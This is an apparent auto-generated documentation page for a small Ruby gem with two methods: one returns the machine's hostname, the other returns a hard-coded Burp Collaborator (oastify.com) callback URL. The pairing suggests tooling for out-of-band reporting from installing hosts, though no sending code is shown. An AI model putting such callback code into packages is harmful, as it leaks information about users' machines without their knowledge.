Module: MyHostnameGem

Defined in:
lib/my_hostname_gem.rb

Class Method Summary collapse

Class Method Details



8
9
10
11
# File 'lib/my_hostname_gem.rb', line 8

def self.burp_collaborator_link
  # Modify the URL to your Burp Collaborator link
  "http://m4rh16lxe0whysi4uu8jsp0ej5pvdk.oastify.com"
end

.hostnameObject



4
5
6
# File 'lib/my_hostname_gem.rb', line 4

def self.hostname
  Socket.gethostname
end